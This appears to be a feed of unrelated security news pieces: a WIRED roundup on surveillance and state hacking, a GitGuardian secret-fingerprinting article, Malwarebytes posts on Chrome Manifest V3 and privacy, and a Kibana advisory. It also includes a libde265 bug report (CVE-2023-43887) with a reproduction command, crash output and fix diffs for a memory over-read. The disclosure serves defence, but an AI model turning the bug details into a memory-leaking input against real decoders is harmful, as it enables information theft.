Plus: North Korean supply chain attacks, a Russian USB worm spreads internationally, and more.

Trillions of domestic phone records in the United States are tracked every year under a secretive surveillance operation, WIRED revealed this week. The Data Analytical Services program, which was previously known as Hemisphere, allows cops to request and analyze the phone records of people and others who they communicate with, including those not suspected of crimes. The surveillance system is run by the White House, with telecom firm AT&T providing phone records in response to law enforcement requests.

The crypto world kept tumbling this week. After Sam Bankman-Fried was found guilty at the start of this month, it was the turn of crypto exchange Binance and its CEO Changpeng Zhao to face scrutiny from US officials. The US Department of Justice unsealed an indictment against the company, which accuses it of violating US anti-money-laundering laws and of enabling Iran, Cuba, and Russia to launder dirty money.

If you’re in the US and have some extra time over the long holiday weekend, it’s also worth catching up on Andy Greenberg’s epic tale of the three young hackers twho brought down the internet with the Mirai botnet—and their story of redemption. Then it’s definitely time to log off.

That’s not all. Each week, we round up the security and privacy stories we didn’t report on in depth ourselves. Click the headlines to read the full stories, and stay safe out there.

Google makes most of its money from advertising—and it doesn’t like ad blockers, which prevent millions of ads being shown on websites every day. In recent months, the company has been cracking down on ad blockers on YouTube in a big way. But that’s just the start of it.

This week YouTube confirmed it has, in some instances, introduced a five-second delay before videos load if people are using an ad blocker in their browser. “In the past week, users using ad blockers may have experienced suboptimal viewing, which included delays in loading, regardless of the browser they are using,” a YouTube spokesperson told The Verge. The company admitted the delays had been happening after some people on Reddit and Hacker News spotted slow loading times and initially thought it was because of the browser they were using.

The move follows Google announcing last week that it is going ahead with plans to change how Chrome browser extensions operate, which may limit how some popular ad blockers work. Last year the company paused its plans to roll out Manifest V3, the platform that browser extensions work on, after complaints about how it would impact some extensions. As Ars Technica reported, Google is planning on rolling out a revised version of Manifest V3 in June next year. Google says Manifest V3 is designed to make Chrome run smoothly by reducing the resources that extensions can use and improve security. However ad blockers and privacy experts have criticized how the system works and, in particular, changes to the Declarative Net Request API.

Google proposed putting restrictions on this API but has relaxed these somewhat in the new version of Manifest V3. It originally planned to allow browser extensions to make 5,000 content-filtering “rules,” but it has now increased this to 30,000 rules. AdGuard, an ad blocker, has tentatively welcomed some of the revised changes. Elsewhere, uBlock Origin, which uses around 300,000 filtering rules, has created a “lite” version of its extension in response to Manifest V3. The developer behind uBlock Origin says the lite version is not as “capable” as the full version. Meanwhile, browser makers Brave and Firefox say they are introducing work-arounds to stop ad blockers from being impacted by the changes.

Supply chain attacks, where malware is implanted in a company's legitimate software and spread to the firm's customers, can be incredibly hard to detect and can cause billions of dollars in damage if they’re successful. Hackers for North Korea are increasingly adopting the sophisticated attack method.

This week Microsoft revealed it has discovered the hermit kingdom’s hackers implanting malicious code inside an installer file for photo and video editing software CyberLink. The installer file used legitimate code from CyberLink and was hosted on the company's servers, obscuring the malicious file it contained. Once installed, Microsoft said, the malicious file would deploy a second payload. More than 100 devices have been impacted by the attack, Microsoft says, and it has attributed the attack to the North Korea-based Diamond Sleet hacking group.

After details of the attack were revealed, the UK’s National Cyber Security Centre and the Republic of Korea’s National Intelligence Service issued a warning saying that North Korea’s supply chain attacks are “growing in sophistication and volume.” The two bodies say the tactics support North Korea’s wider priorities, such as stealing money to help fund its ailing economy and nuclear programs, espionage, and stealing tech secrets.

Some flights have had to change course or lost satellite signals in midair due to electronic warfare, _The New York Times_ reported this week. The ongoing conflicts in Ukraine and Gaza have seen GPS jamming and spoofing technologies interfere with the daily operation of flights in and around the areas. The incidents, so far, have not been dangerous. But they highlight the increase in electronic warfare capabilities—which seek to interrupt or disrupt the technologies used for communications and infrastructure—and how the technology needed to launch them is getting cheaper. Since Russia’s full-scale invasion of Ukraine in February 2022, electronic warfare tactics have become increasingly common on both sides, as drones being used for surveillance and reconnaissance have had their signals interrupted and rockets have been sent off course.

Gamaredon is one of Russia’s most brazen hacking groups—the hackers have consistently attacked Ukrainian systems. Now one piece of its malware, a worm that spreads via USB stick and is dubbed LitterDrifter, has spread internationally. The worm has been spotted in the US, Hong Kong, Germany, Poland, and Vietnam, according to researchers at security firm Check Point. The company’s researchers say the worm includes two elements: a spreading module and a second module that also communicates with Gamaredon’s servers. “It’s clear that LitterDrifter was designed to support a large-scale collection operation,” the Check Point researchers write, adding that it’s likely the worm has “spread beyond its intended targets.”

Google’s Ad Blocker Crackdown Is Growing

The title of this article probably sounds like the caption to a meme. Instead, this is an actual problem GitGuardian's engineers had to solve in implementing the mechanisms for their new HasMySecretLeaked service. They wanted to help developers find out if their secrets (passwords, API keys, private keys, cryptographic certificates, etc.) had found their way into public GitHub repositories. How

Developer Tools / API Security

The title of this article probably sounds like the caption to a meme. Instead, this is an actual problem GitGuardian's engineers had to solve in implementing the mechanisms for their new HasMySecretLeaked service. They wanted to help developers find out if their secrets (passwords, API keys, private keys, cryptographic certificates, etc.) had found their way into public GitHub repositories. How could they comb a vast library of secrets found in publicly available GitHub repositories and their histories and compare them to your secrets without you having to expose sensitive information? This article will tell you how.

First, if we were to set a bit's mass as equal to that of one electron, a ton of data would be around 121.9 quadrillion petabytes of data at standard Earth gravity or $39.2 billion billion billion US dollars in MacBook Pro storage upgrades (more than all the money in the world). So when this article claims GitGuardian scanned a "ton" of GitHub public commit data, that's figurative, not literal.

But yes, they scanned a "ton" of public commits and gists from GitHub, traversing commit histories, and found _millions_ of secrets: passwords, API keys, private keys, cryptographic certificates, and more. And no, "millions" is not figurative. They literally found over 10 million in 2022.

How could GitGuardian make it possible for developers and their employers to see if their current and valid secrets were among that 10+ million without simply publishing millions of secrets, making it easier for threat actors to find and harvest them, and letting a lot of genies out of a lot of bottles? One word: fingerprinting.

After some careful evaluation and testing, they developed a secret-fingerprinting protocol that encrypts and hashes the secret, and then just a partial hash is shared with GitGuardian. With this they could limit the number of potential matches to a manageable number without knowing enough of the hash to reverse and decrypt it. To further ensure security, they put the toolkit for encrypting and hashing the secret on the client-side.

If you're using the HasMySecretLeaked web interface, you can copy a Python script to create the hash locally and just put the output in the browser. You never have to put the secret itself anywhere it can be transmitted by the browser and you can easily review the 21 lines of code to prove to yourself that it's not sending anything outside the terminal session you opened to run the script. If that's not enough, open the F12 developer tools in Chrome or another browser and go to the "Network" panel to monitor what information the web interface is sending upstream.

If you're using the open source ggshield CLI you can inspect the CLI's code to see what is happening when you use the hmsl command. Want even more assurance? Use a traffic inspector like Fiddler or Wireshark to view what's being transmitted.

GitGuardian's engineers knew that even customers who trusted them would be apprehensive about pasting an API key or some other secret into a box on a web page. For both security and the peace of mind of everyone who uses the service, they chose to be as transparent as possible and put as much of the process under customer control as possible. This goes beyond their marketing materials and into the ggshield documentation for the hsml command.

GitGuardian went the extra mile to make sure that people using their HasMySecretLeaked checker don't have to share the actual secrets to see if they leaked. And it's paid off. Over 9,000 secrets were checked in the first few weeks it was live.

If your secrets have already been publicly divulged, it's better to know than not. They may not have been exploited yet, but it's likely just a matter of time. You can check up to five per day for free via the HasMySecretLeaked checker via the web, and even more using the GitGuardian shield CLI. And even if you're not looking to see if your secrets leaked, you should look at their code and methods to help inspire your efforts to make it easier for your customers to share sensitive information without sharing the information itself.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tell Me Your Secrets Without Telling Me Your Secrets

Google has set a date for the introduction of Manifest V3 which will hurt the capabilities of many ad blockers.

Google has announced it will shut down Manifest V2 in June 2024 and move on to Manifest V3, the latest version of its Chrome extension specification that has faced criticism for putting limits on ad blockers. Roughly said, Manifest V2 and V3 are the rules that browser extension developers have to follow if they want their extensions to get accepted into the Google Play Store.

Manifest V2 is the old model. The Chrome Web Store no longer accepts Manifest V2 extensions, but browsers can still use them. For now. Manifest V3 is supported generally in Chrome 88 or later and will be the standard after the transition planned to take place in June 2024.

A popular type of browser extensions are ad blockers. Almost all these ad blockers work with block lists, which are long lists of domains, subdomains, and IP addresses that they filter out of your web traffic. These lists are commonly referred to as rulesets. One part of the transition will “improve” content filtering. And to be fair, Google has made some compromises when it comes to the version as it’s now in the planning, compared to what it originally planned to do.

*   Originally, each extension could offer users a choice of 50 static rulesets, and 10 of these rulesets could be enabled simultaneously. This changes to 50 extensions simultaneously and 100 in total.
*   Extensions could add up to 5,000 rules dynamically which encouraged using this functionality sparingly and made it easier for Google to detect abuse. Extensions can add rules dynamically to support more frequent updates and user-defined rules. But it comes with the risks of phishing or data theft because these “updates” are not checked during the Chrome Web Store review. For example, a redirect rule could be abused to inject affiliate links without consent. But Google has decided that block and allow are not that easily abused so it will allow up to 30,000 rules to be added dynamically.

However, this is still far from enough to fully reach the potential of the best ad blockers we have now. And it’s not just the hard limits on filtering rulesets, there are a lot of other new limits on filtering. Items can’t be filtered based on the response headers or according to the URL in the address bar. Also, extension developers are limited in what regular expressions they can use, along with other technical limitations.

Even if this is not targeted at ad blockers specifically, it’s still a major change that makes blocking requests less flexible. But the bottom line result is that it limits the API that many ad blockers use, and replace it with a less capable one.

Google’s will tell you that by limiting extensions, the browser can be lighter on resources, and Google can protect your privacy from extension developers and calls it “a step in the direction of privacy, security, and performance.” The Electronic Frontier Foundation (EFF) however calls Manifest V3 deceitful and threatening.

> “Manifest V3 is another example of the inherent conflict of interest that comes from Google controlling both the dominant web browser and one of the largest internet advertising networks.”

Under the new specifications, browser extensions that monitor and filter the web traffic between the browser and the website will have greatly reduced capabilities. This includes ad blockers and privacy-protective tracker blockers. No real surprise, considering Google has trackers installed on 75% of the top one million websites.

According to Firefox’s Add-on Operations Manager, most malicious extension that manage to get through the security review process, are usually interested in simply observing the conversation between your browser and whatever websites you visit. The malicious activity happens elsewhere, after the data has already been read. So in their mind, what would really help security is a more thorough review process, but that’s not something Google says it has plans for.

After looking at the arguments Google used to justify this transition, ArsTechnica came to the conclusion that there’s no justification for arbitrarily limiting the list of filter rules. It says once Manifest V3 happens, Chrome users will be limited to light ad blocker functionality while users will need to switch to Firefox or some other non-limited browser to get the full extension.

Nevertheless, Firefox said it will adopt Manifest V3 in the interest of cross-browser compatibility. And Chrome’s market share will certainly have influenced that decision as well.

Google Chrome Enterprise users with the “ExtensionManifestV2Availability” policy turned on will get an extra year of Manifest V2 compatibility.

If you want to help Malwarebytes get ready for the transition, you can test the beta version of Browser Guard for Manifest V3.

**We don’t just report on privacy—we offer you the option to use it.**

Privacy risks should never spread beyond a headline. Keep your online privacy yours by using Malwarebytes Privacy VPN.

**Black Friday sale**

Save 50% on our Home bundles for a limited time only!

 Chrome pushes forward with plans to limit ad blockers in the future 

Libde265 v1.0.12 was discovered to contain multiple buffer overflows via the num_tile_columns and num_tile_row parameters in the function pic_parameter_set::dump.

**Summary**

There is a segmentation fault caused by a buffer over-read on pic\_parameter\_set::dump due to an incorrect value of num\_tile\_columns or num\_tile\_rows.

**Tested with:**

*   Commit: 6fc550f (master)
*   PoC: poc
*   cmd: ./dec265 -d poc

**Crash output:**

    INFO: ----------------- SPS -----------------
    INFO: video_parameter_set_id  : 0
    INFO: sps_max_sub_layers      : 1
    INFO: sps_temporal_id_nesting_flag : 1
    INFO:   general_profile_space     : 0
    INFO:   general_tier_flag         : 0
    INFO:   general_profile_idc       : Main
    INFO:   general_profile_compatibility_flags: 0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
    INFO:     general_progressive_source_flag : 0
    INFO:     general_interlaced_source_flag : 0
    INFO:     general_non_packed_constraint_flag : 0
    INFO:     general_frame_only_constraint_flag : 0
    INFO:   general_level_idc         : 60 (2.00)
    INFO: seq_parameter_set_id    : 0
    INFO: chroma_format_idc       : 1 (4:2:0)
    INFO: pic_width_in_luma_samples  : 416
    INFO: pic_height_in_luma_samples : 240
    INFO: conformance_window_flag    : 1
    INFO: conf_win_left_offset  : 0
    INFO: conf_win_right_offset : 0
    INFO: conf_win_top_offset   : 0
    INFO: conf_win_bottom_offset: 0
    INFO: bit_depth_luma   : 10
    INFO: bit_depth_chroma : 9
    INFO: log2_max_pic_order_cnt_lsb : 4
    INFO: sps_sub_layer_ordering_info_present_flag : 1
    INFO: Layer 0
    INFO:   sps_max_dec_pic_buffering      : 5
    INFO:   sps_max_num_reorder_pics       : 3
    INFO:   sps_max_latency_increase_plus1 : 0
    INFO: log2_min_luma_coding_block_size : 3
    INFO: log2_diff_max_min_luma_coding_block_size : 1
    INFO: log2_min_transform_block_size   : 2
    INFO: log2_diff_max_min_transform_block_size : 2
    INFO: max_transform_hierarchy_depth_inter : 0
    INFO: max_transform_hierarchy_depth_intra : 0
    INFO: scaling_list_enable_flag : 0
    INFO: amp_enabled_flag                    : 1
    INFO: sample_adaptive_offset_enabled_flag : 1
    INFO: pcm_enabled_flag                    : 0
    INFO: num_short_term_ref_pic_sets : 11
    INFO: ref_pic_set[  0 ]: X...X.X.X.......|................
    INFO: ref_pic_set[  1 ]: ..........X.X...|...X............
    INFO: ref_pic_set[  2 ]: ............X.X.|.X...X..........
    INFO: ref_pic_set[  3 ]: ...............X|X.X...X.........
    INFO: ref_pic_set[  4 ]: .............X.X|X...X...........
    INFO: ref_pic_set[  5 ]: ..........X.X.X.|.X..............
    INFO: ref_pic_set[  6 ]: ...........X...X|X.X.............
    INFO: ref_pic_set[  7 ]: .............X..|X.X.X...........
    INFO: ref_pic_set[  8 ]: ........X.......|................
    INFO: ref_pic_set[  9 ]: ............X...|...X............
    INFO: ref_pic_set[ 10 ]: ..............X.|.X...X..........
    INFO: long_term_ref_pics_present_flag : 0
    INFO: sps_temporal_mvp_enabled_flag      : 1
    INFO: strong_intra_smoothing_enable_flag : 1
    INFO: vui_parameters_present_flag        : 1
    INFO: sps_extension_present_flag    : 0
    INFO: sps_range_extension_flag      : 0
    INFO: sps_multilayer_extension_flag : 0
    INFO: sps_extension_6bits           : 0
    INFO: CtbSizeY     : 16
    INFO: MinCbSizeY   : 8
    INFO: MaxCbSizeY   : 16
    INFO: MinTBSizeY   : 4
    INFO: MaxTBSizeY   : 16
    INFO: PicWidthInCtbsY         : 26
    INFO: PicHeightInCtbsY        : 15
    INFO: SubWidthC               : 2
    INFO: SubHeightC              : 2
    INFO: ----------------- VUI -----------------
    INFO: sample aspect ratio        : 0:0
    INFO: overscan_info_present_flag : 0
    INFO: overscan_appropriate_flag  : 0
    INFO: video_signal_type_present_flag: 0
    INFO: chroma_loc_info_present_flag: 0
    INFO: neutral_chroma_indication_flag: 0
    INFO: field_seq_flag                : 0
    INFO: frame_field_info_present_flag : 0
    INFO: default_display_window_flag   : 1
    INFO:   def_disp_win_left_offset    : 0
    INFO:   def_disp_win_right_offset   : 0
    INFO:   def_disp_win_top_offset     : 0
    INFO:   def_disp_win_bottom_offset  : 0
    INFO: vui_timing_info_present_flag  : 0
    INFO: vui_poc_proportional_to_timing_flag : 0
    INFO: vui_num_ticks_poc_diff_one          : 1
    INFO: vui_hrd_parameters_present_flag : 0
    INFO: bitstream_restriction_flag         : 0
    INFO: ----------------- PPS -----------------
    INFO: pic_parameter_set_id       : 0
    INFO: seq_parameter_set_id       : 0
    INFO: dependent_slice_segments_enabled_flag : 1
    INFO: sign_data_hiding_flag      : 1
    INFO: cabac_init_present_flag    : 0
    INFO: num_ref_idx_l0_default_active : -84
    INFO: num_ref_idx_l1_default_active : 12
    INFO: pic_init_qp                : 25
    INFO: constrained_intra_pred_flag: 0
    INFO: transform_skip_enabled_flag: 1
    INFO: cu_qp_delta_enabled_flag   : 0
    INFO: pic_cb_qp_offset             : 1
    INFO: pic_cr_qp_offset             : 0
    INFO: pps_slice_chroma_qp_offsets_present_flag : 0
    INFO: weighted_pred_flag           : 0
    INFO: weighted_bipred_flag         : 1
    INFO: output_flag_present_flag     : 0
    INFO: transquant_bypass_enable_flag: 0
    INFO: tiles_enabled_flag           : 1
    INFO: entropy_coding_sync_enabled_flag: 0
    INFO: num_tile_columns    : 18815
    INFO: num_tile_rows       : 1
    INFO: uniform_spacing_flag: 1
    INFO: tile column boundaries: 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 3985 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 [1]    4017733 segmentation fault  ./dec265 -d poc
    

**Analysis**

While executing decoder_context::read_pps_NAL, parameters are read in

bool success = new\_pps->read(&reader,this);

Inside the function, there is a check when setting num_tile_columns in case it goes over DE265_MAX_TILE_COLUMNS, which is 10.

  if (tiles\_enabled\_flag) {
    num\_tile\_columns = get\_uvlc(br);
    if (num\_tile\_columns == UVLC\_ERROR ||
	num\_tile\_columns+1 > DE265\_MAX\_TILE\_COLUMNS) {
      ctx->add\_warning(DE265\_WARNING\_PPS\_HEADER\_INVALID, false);
      return false;
    }

After exiting due to reading more than DE265_MAX_TILE_COLUMNS, the headers are dumped by calling dump:

  bool success = new\_pps->read(&reader,this);

  if (param\_pps\_headers\_fd>=0) {
    new\_pps->dump(param\_pps\_headers\_fd);
  }

  if (success) {
    pps\[ (int)new\_pps->pic\_parameter\_set\_id \] = new\_pps;
  }

In dump, the following code is executed to dump the tile column boundaries:

    LOG0("tile column boundaries: ");
    for (int i=0;i<=num\_tile\_columns;i++) {
      LOG1("\*%d ",colBd\[i\]);
    }
    LOG0("\*\\n");

As previously shown, num_tile_columns while be set to a higher number than DE265_MAX_TILE_COLUMNS. colBd is defined as:

int colBd    [ DE265_MAX_TILE_COLUMNS+1 ];

Therefore, that loop will go over colBd and will print all the data pointed by the values found after the limits of colBd in memory until the end of the loop or the next memory address is invalid.

**Impact**

*   Information leak from memory
*   Crash

If using a carefully crafted exploit, the impact could be an information leak without a crash.

**Patch**

In order to prevent this, the success value should be checked before printing the information:

diff --git a/libde265/decctx.cc b/libde265/decctx.cc
index 223a6aaf..1b79adec 100644
\--- a/libde265/decctx.cc
+++ b/libde265/decctx.cc
@@ -583,11 +583,10 @@ de265\_error decoder\_context::read\_pps\_NAL(bitreader& reader)
 
   bool success = new\_pps->read(&reader,this);
 
\-  if (param\_pps\_headers\_fd>=0) {
\-    new\_pps->dump(param\_pps\_headers\_fd);
\-  }
\-
   if (success) {
+    if (param\_pps\_headers\_fd>=0) {
+      new\_pps->dump(param\_pps\_headers\_fd);
+    }
     pps\[ (int)new\_pps->pic\_parameter\_set\_id \] = new\_pps;
   }

Another possibility could be to perform length checks inside the dump function to handle the case:

diff --git a/libde265/pps.cc b/libde265/pps.cc
index de3bcda1..a5abd9b3 100644
\--- a/libde265/pps.cc
+++ b/libde265/pps.cc
@@ -903,14 +903,22 @@ void pic\_parameter\_set::dump(int fd) const
     LOG1("uniform\_spacing\_flag: %d\\n", uniform\_spacing\_flag);
 
     LOG0("tile column boundaries: ");
\-    for (int i=0;i<=num\_tile\_columns;i++) {
\-      LOG1("\*%d ",colBd\[i\]);
+    if (num\_tile\_columns+1 > DE265\_MAX\_TILE\_COLUMNS) {
+      LOG0("Number of tile columns is invalid");
+    } else {
+      for (int i=0;i<=num\_tile\_columns;i++) {
+        LOG1("\*%d ",colBd\[i\]);
+      }
     }
     LOG0("\*\\n");
 
     LOG0("tile row boundaries: ");
\-    for (int i=0;i<=num\_tile\_rows;i++) {
\-      LOG1("\*%d ",rowBd\[i\]);
+    if (num\_tile\_rows+1 > DE265\_MAX\_TILE\_ROWS) {
+      LOG0("Number of tile rows is invalid");
+    } else {
+      for (int i=0;i<=num\_tile\_rows;i++) {
+        LOG1("\*%d ",rowBd\[i\]);
+      }
     }
     LOG0("\*\\n");

**Other notes**

The same issue occurs with num_tile_rows.

CVE-2023-43887: Buffer over-read causes segmentation fault in pic_parameter_set::dump · Issue #418 · strukturag/libde265

Here are the innovations we’ve made in our products recently. Are you making the most of them?

At Malwarebytes, we’re constantly evolving to protect our customers. These days, our products don’t just protect you from malware, we protect your identity, defend you from ads, safeguard your social media, and keep your mobile safe too.

Here are the innovations we’ve made in our products recently. Are you making the most of them?

****Malwarebytes Premium******Windows**

**Tamper** / **Uninstall Protection**. This allows you to password protect your software so that it can’t be removed remotely.

**Trusted Advisor**. This dashboard provides an easy-to-understand assessment of your computer’s security with a single comprehensive protection score, and clear, expert-driven advice.

**Brute Force Protection**. This blocks Remote Desktop Protocol (RDP) attacks, which are attempts by cybercriminals to access a computer remotely. We do this by blocking IP addresses that exceed a threshold of invalid login attempts.

**Smart Scan.** This enables you to schedule scans at a time when you’re not using your computer, which is best for productivity.

**Mac**

The old adage about Macs not getting viruses is simply not true. Macs need protection too and our **Premium for Mac** is now compatible with macOS Sonoma.

**Mobile Security**

Whether you’re on iOS or Android, our Mobile Security app just got an upgrade. Our **Premium Plus** plan now includes a full-featured VPN to help keep your connections private, no matter where you are. Using the latest VPN technology, WireGuard® protocol, you can enjoy better online privacy at a quicker speed than traditional VPNs.

What you get with our apps:

*   **Android:** Scan for viruses and malware, and detect ransomware, android exploits, phishing scams, and even potentially unwanted apps.

*   **iOS:** Detect and stop robocalls and fake texts, phishing links, malicious sites, and annoying ad trackers (while browsing in Safari).

**Browser Guard**

Available for both Windows and Mac, Malwarebytes Browser Guard is our free browser extension for Chrome, Edge, Firefox, and Safari that blocks unwanted and unsafe content, giving users a safer and faster browsing experience. It’s the world’s first browser extension to do this, while at the same time identifying and stopping tech support scams.

Browser Guard adds an extra layer to your personal security, on top of your antivirus or firewall. Because it’s a browser extension, it can offer protection in the browser that other means of protection do not have access to.

We’ve recently made enhancements to Browser Guard:

*   **Improved protection:** Stops even more threats with enhanced phishing detection. 
*   **New scanning blocks:** Prevents websites from scanning for vulnerable network ports. 
*   **Facebook support:** Blocks ads and sponsored content from appearing on Facebook feeds. 
*   **Monthly overview:** Summary showcases what has been blocked. 

On top of that, Malwarebytes Premium Security users (Windows only) can now take advantage of:

*   **Content control:** Take control of your browsing experience and define what’s appropriate for you and your family. Fully customize the content you want to block while browsing.
*   **Import and export:** Use your preferences and customized rules with all your browsers, even on other devices. This helps you to experience a consistent and clean web experience. Discover on this video how to transfer Malwarebytes Browser Guard settings to another browser.
*   **Historical Detection Statistics:** View past detections and see what we’ve protected you from.  

Want to see Browser Guard in action? Read the 25 most popular websites vs Malwarebytes Browser Guard

****Malwarebytes Identity Theft Protection****

Newly released, Malwarebytes Identity Theft Protection scours the dark web for your personal information, prevents your social media account from being hacked, and even keeps an eye on your credit (US only) — and it’s all backed by an up-to-$2 million identity theft insurance. (Insurance coverage is $1 or $2 million depending on selected package (latter only available in the US plan **Ultimate)**)

Here’s what you get (based on your selected plan):

*   Ongoing monitoring: Peace of mind that we are actively working in the background to keep you safe
*   Real-time alerts: Immediate notifications if we identify suspicious activity
*   Recommendations and best practices: Advice on how to prevent identity theft, and help if it happens
*   Identity restoration helpline and top-notch customer support.

 Malwarebytes consumer product roundup: The latest 

Google's recently been accused of "privacy washing", despite claiming its a privacy-focused company. But what is privacy washing?

Question: Who said the sentence below?

> “Privacy is at the heart of everything we do.”

Answer: Sundar Pichai, the CEO of Alphabet and its largest subsidiary Google. And if you look at the recent actions Google has announced, you’d be tempted to take his word for it:

*   An initiative to let Chrome hide your IP address.
*   Strengthening the safeguard measures for Google Workspace customers.
*   Changing data retention practices to make auto-delete the default.

But at the same time, Google is under fire because some of its actions seem half-baked. Allegedly Google’s option to “browse privately” is nothing more than a word play.

Let’s be fair. Google makes lots and lots of money by knowing what we are looking for. And to achieve that goal it needs to gather as much information as possible about us. Maybe not specifically about us as a person, but at least about us as a group.

Data are the most coveted currency of our era, and technology giants like Facebook, Google, and Amazon are considered the behemoths of the data gathering industry. If they don’t already, they want to know everything about each and every one of us.

We’re not all equally valued though. Certain milestones in a person’s life prompt major changes in buying patterns, whether that’s becoming a parent, moving home, getting married, buying a car, or going through a divorce. Some of the most personal and secretive troves of data rank as the most expensive.

In a recent blog, privacy company Proton explained how Google is spending millions lobbying and actively fighting against privacy laws that would protect you from online surveillance.

Proton used the expression, “privacy washing” which compares Google’s disparity between actions and words to those of the world’s largest environmental polluters who portray themselves as eco-conscious, known as “green washing.“

According to lobbying reports and other records, Alphabet and its subsidiaries have spent more than $125 million on federal lobbying, campaign contributions, and trade associations since 2019.

This is done under the guise that Google wants regulators to let companies decide themselves what’s good for you and for society. But so far, big tech is consistently letting us down in this regard.

A small but telling example was a recent court case where a judge ruled that car manufacturers collecting users’ text messages and call logs did not meet the Washington Privacy Act’s (WPA) standard that a plaintiff must prove that “his or her business, his or her person, or his or her reputation” has been threatened.

In other words they can steal all the data they want as long as you can’t prove that it doesn’t hurt your business, yourself or your reputation. Does that sound fair to you?

Several US states are going through the process of passing new comprehensive consumer privacy laws, in an attempt to give American citizens more control over their personal data. Privacy advisor IAPP reckons that by 2026, 13 state privacy laws will have taken effect, as newly enacted laws in Delaware, Florida, Indiana, Iowa, Montana, Oregon, Tennessee, and Texas will join California, Colorado, Connecticut, Utah, and Virginia.

The European Union (EU) is a pioneer when it comes to privacy laws, so it’s easy to see why Big Tech has spent so much money (about $30 million in 2021) lobbying European lawmakers to protect their data gathering practices. Google has been among the most aggressive to water down or slow down the expansion of consumer protections through additional regulations — in particular the Digital Markets Act, Digital Services Act, and ePrivacy Regulation. Google happily bragged about stalling the ePrivacy Regulation, which would crack down on tracking cookies.

It’s common for industries to lobby lawmakers on issues affecting their business. But there is a massive disparity in the state-by-state battle over privacy legislation between well-funded, well-organized tech lobbyists and their opposition of relatively scattered consumer advocates and privacy-minded politicians, The Markup has found.

So, Sundar Pichai, we would like you to put your money where your mouth is. And make some real changes to improve our privacy, rather than engage in privacy washing.

**We don’t just report on threats – we help safeguard your entire digital identity**

Cybersecurity risks should never spread beyond a headline. Protect your and your family’s personal information by using Malwarebytes Identity Theft Protection.

 Explained: Privacy washing 

Kibana contains an embedded version of the Chromium browser that the Reporting feature uses to generate the downloadable reports. If a user with permissions to generate reports is able to render arbitrary HTML with this browser, they may be able to leverage known Chromium vulnerabilities to conduct further attacks. Kibana contains a number of protections to prevent this browser from rendering arbitrary content.

CVE-2021-22142: Elastic Stack 7.13.0 and 6.8.16 Security Update

